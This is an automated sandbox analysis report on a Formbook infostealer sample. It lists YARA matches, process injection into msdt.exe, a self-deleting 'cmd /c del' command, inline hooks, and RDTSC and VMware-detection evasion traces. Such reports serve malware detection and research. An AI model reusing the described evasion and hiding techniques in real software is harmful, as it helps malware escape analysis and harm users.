          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404763
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC2421B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,1_2_6FC2421B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,1_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
          Source: C:\Users\user\Desktop\cryptedprof.exeFile created: C:\Users\user\AppData\Local\Temp\nsv1C7.tmpJump to behavior
          Source: cryptedprof.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cryptedprof.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: cryptedprof.exeReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\cryptedprof.exeFile read: C:\Users\user\Desktop\cryptedprof.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'Jump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: cryptedprof.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\cryptedprof.exeUnpacked PE file: 3.2.cryptedprof.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_70991A98
          Source: 8chdn.dll.1.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70992F60 push eax; ret 1_2_70992F8E
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00416A63 push esp; retf 3_2_00416AAE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00416AF0 pushfd ; iretd 3_2_00416AF1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00416AA8 push esp; retf 3_2_00416AAE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00417B8F push ebp; ret 3_2_00417B93
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_004173B1 push edx; retf 3_2_004173BA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_004135D2 push cs; ret 3_2_004135DF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CEB5 push eax; ret 3_2_0041CF08
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CF6C push eax; ret 3_2_0041CF72
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CF02 push eax; ret 3_2_0041CF08
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CF0B push eax; ret 3_2_0041CF72
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046ED0D1 push ecx; ret 7_2_046ED0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C76AF0 pushfd ; iretd 7_2_02C76AF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C76AA8 push esp; retf 7_2_02C76AAE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C76A63 push esp; retf 7_2_02C76AAE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C77B8F push ebp; ret 7_2_02C77B93
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C773B1 push edx; retf 7_2_02C773BA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CEB5 push eax; ret 7_2_02C7CF08
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CF6C push eax; ret 7_2_02C7CF72
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CF02 push eax; ret 7_2_02C7CF08
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CF0B push eax; ret 7_2_02C7CF72
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C735D2 push cs; ret 7_2_02C735DF
          Source: initial sampleStatic PE information: section name: .data entropy: 7.23183783874
          Source: C:\Users\user\Desktop\cryptedprof.exeFile created: C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\cryptedprof.exeFile created: C:\Users\user\AppData\Local\Temp\8chdn.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\cryptedprof.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002C698E4 second address: 0000000002C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002C69B5E second address: 0000000002C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409A90 rdtsc 3_2_00409A90
          Source: C:\Windows\explorer.exe TID: 4928Thread sleep time: -58000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000002.601400852.000000000461E000.00000004.00000001.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&%
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345049804.000000000461E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409A90 rdtsc 3_2_00409A90
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0040ACD0 LdrLoadDll,3_2_0040ACD0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_70991A98
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC24582 mov eax, dword ptr fs:[00000030h]1_2_6FC24582
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC24785 mov eax, dword ptr fs:[00000030h]1_2_6FC24785
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]3_2_00AF90AF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h]3_2_00AB9080
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]3_2_00B33884
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]3_2_00B33884
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h]3_2_00AB58EC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]3_2_00ADB8E4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]3_2_00ADB8E4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]3_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]3_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]3_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]3_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]3_2_00B84015
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]3_2_00B84015
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h]3_2_00B72073
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h]3_2_00B81074
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]3_2_00AD0050
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]3_2_00AD0050
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]3_2_00AE61A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]3_2_00AE61A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h]3_2_00B369A6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h]3_2_00AEA185
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h]3_2_00ADC182
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h]3_2_00AE2990
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
